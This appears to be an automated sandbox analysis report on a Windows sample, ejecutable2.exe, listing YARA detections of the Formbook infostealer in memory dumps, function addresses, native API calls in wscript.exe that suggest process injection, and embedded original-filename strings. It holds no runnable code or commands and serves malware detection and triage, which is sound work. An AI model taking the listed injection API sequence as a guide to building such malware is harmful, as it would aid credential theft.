          Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large stringsShow sources
          Source: ejecutable2.exe, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
          Source: CmsVPZkxbOtm.exe.0.dr, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
          Source: 0.0.ejecutable2.exe.1120000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
          Source: 0.2.ejecutable2.exe.1120000.2.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
          Source: 4.2.ejecutable2.exe.1120000.5.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
          Source: ejecutable2.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 0_2_003300F0
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 0_2_003369C9
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 0_2_00336D30
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 0_2_0033E418
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 0_2_00339409
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 0_2_0033E685
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 0_2_0033CC98
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 0_2_00336D21
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 0_2_00338FD0
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 0_2_048C6B67
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 0_2_048C51CC
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 0_2_048C5F99
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_00401030
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_0041BA85
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_0041C296
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_0041BBE0
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_00408C6B
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_00408C70
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_0041C40C
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_0041C4F7
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_0041C55C
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_00402D90
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_02441238
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0239E2E9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023A2305
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023EA37B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023A7353
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023C63DB
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0239F3CF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023CD005
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023B905A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023A3040
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0239E0C6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_02442622
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023A4680
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023AE6C1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023AC7BC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0242579A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023D57C3
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023DD47D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023B1489
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023D5485
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023A351F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023BC5F0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_02453A83
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023C7B00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0242DBDA
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0244CBA4
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0239FBD7
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023C286D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023AC85C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0243F8EE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_02425955
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023A29B2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023B69FE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0244098E
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023D2E2F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023BEE4C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023B0F3F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023CDF7C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023D0D3B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 0239E2A8 appears 35 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 023E3F92 appears 88 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 023E373B appears 213 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 0239DF5C appears 106 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 0240F970 appears 75 times
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_00418700 NtClose,
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_004187B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023900C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023907AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_02390078 NtResumeThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_02390060 NtQuerySection,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_02390048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023910D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0239010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_02391148 NtOpenThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023901D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_02391930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_02390C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0238FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wscript.exeProcess Stats: CPU usage > 98%
          Source: ejecutable2.exe, 00000000.00000002.424354114.00000000011E4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUIntPtrTypeIn.exe4 vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.423754997.00000000004B0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameColladaLoader.dll4 vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.424055969.00000000005BF000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamesctasks.exej% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.425701287.0000000004910000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.423882102.0000000000514000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCSRSS.Exe.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamewinsrv.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWinInit.exe.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWINLOGON.EXE.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameuser32j% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameservices.exe.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamelsasrv.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamewshtcpip.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamewship6.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamewshqos.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAUTHUI.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenametzres.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamesppsvc.exe.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameInput.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTipTsf.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSpTip.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTableTextService.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamegpsvc.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameaero.msstyles.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenametaskcomp.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamespoolsv.exe.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBFE.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFirewallAPI.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenametaskhost.exe.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUSERINIT.EXE.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: originalfilename vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMSCMS.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamej% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMsCtfMonitor.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamesnmptrap.exe.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamelmhsvc.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamedwm.exe.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamedhcpcore.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamepeerdistsh.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNetLogon.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamesstpsvc.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamelocalspl.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamenetmsg.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFXSRESM.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenametaskeng.exe.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWsdMon.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamevsstrace.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWLDAP32.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamenetprofm.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameThemeUI.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameExplorerFrame.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameesrb.dll.muiH vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamexpsrchvw.exe.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamestobject.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamerasdlg.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAltTab.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamewscui.cpl.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameHCPROVIDERS.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSearchIndexer.exe.mui@ vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePNIDUI.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenametquery.dll.mui@ vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameesent.dll.muij% vs ejecutable2.exe
